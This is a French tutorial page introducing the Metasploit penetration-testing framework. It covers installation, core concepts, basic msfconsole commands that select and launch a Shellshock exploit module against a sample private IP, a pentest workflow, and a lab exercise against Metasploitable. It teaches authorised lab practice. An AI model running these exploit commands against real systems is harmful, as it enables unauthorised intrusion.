Metasploit : l’outil de pentesting le plus utilisé au monde
Metasploit Framework est un outil open source de test d’intrusion qui permet de simuler des attaques pour identifier les vulnérabilités de vos systèmes. C’est l’outil de référence pour les professionnels de la cybersécurité.
Avertissement légal
N’utilisez Metasploit que sur des systèmes que vous êtes autorisé à tester. Le pentesting sans autorisation est un délit pénal. Utilisez un lab personnel ou des plateformes comme HackTheBox et TryHackMe.
Installation
Sur Kali Linux (pré-installé)
msfconsole
# Metasploit est déjà installé sur Kali Linux
Sur Ubuntu/Debian
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
Les concepts fondamentaux
| Terme | Définition | Exemple |
|---|---|---|
| Exploit | Code qui exploite une vulnérabilité | EternalBlue (MS17-010) |
| Payload | Code exécuté après l’exploitation | Meterpreter (shell avancé) |
| Module | Composant de Metasploit | auxiliary, exploit, post |
| Listener | Attend la connexion retour | multi/handler |
| Session | Connexion active avec la cible | Meterpreter session |
Commandes de base msfconsole
# Chercher un exploit
search type:exploit name:apache
# Sélectionner un module
use exploit/multi/http/apache_mod_cgi_bash_env_exec
# Voir les options requises
show options
# Configurer la cible
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
# Lancer l’exploit
exploit
Workflow type d’un pentest
- Reconnaissance : Nmap pour scanner les ports et services
- Recherche : searchsploit ou search dans msfconsole
- Configuration : définir RHOSTS, LHOST, payload
- Exploitation : lancer l’exploit
- Post-exploitation : escalade de privilèges, pivot
- Rapport : documenter les vulnérabilités trouvées
Lab d’entraînement recommandés
- Metasploitable 2/3 : VM vulnérable conçue pour s’entraîner
- DVWA : Damn Vulnerable Web App
- TryHackMe : parcours guidés gratuits
- HackTheBox : challenges plus avancés
- VulnHub : VMs téléchargeables
Exercice pratique
Premier pentest en lab
- Installez VirtualBox et Kali Linux
- Téléchargez et importez Metasploitable 2
- Scannez Metasploitable avec Nmap
- Identifiez un service vulnérable (ex : vsftpd 2.3.4)
- Trouvez l’exploit dans Metasploit
- Exploitez et obtenez un shell
- Documentez la vulnérabilité et la correction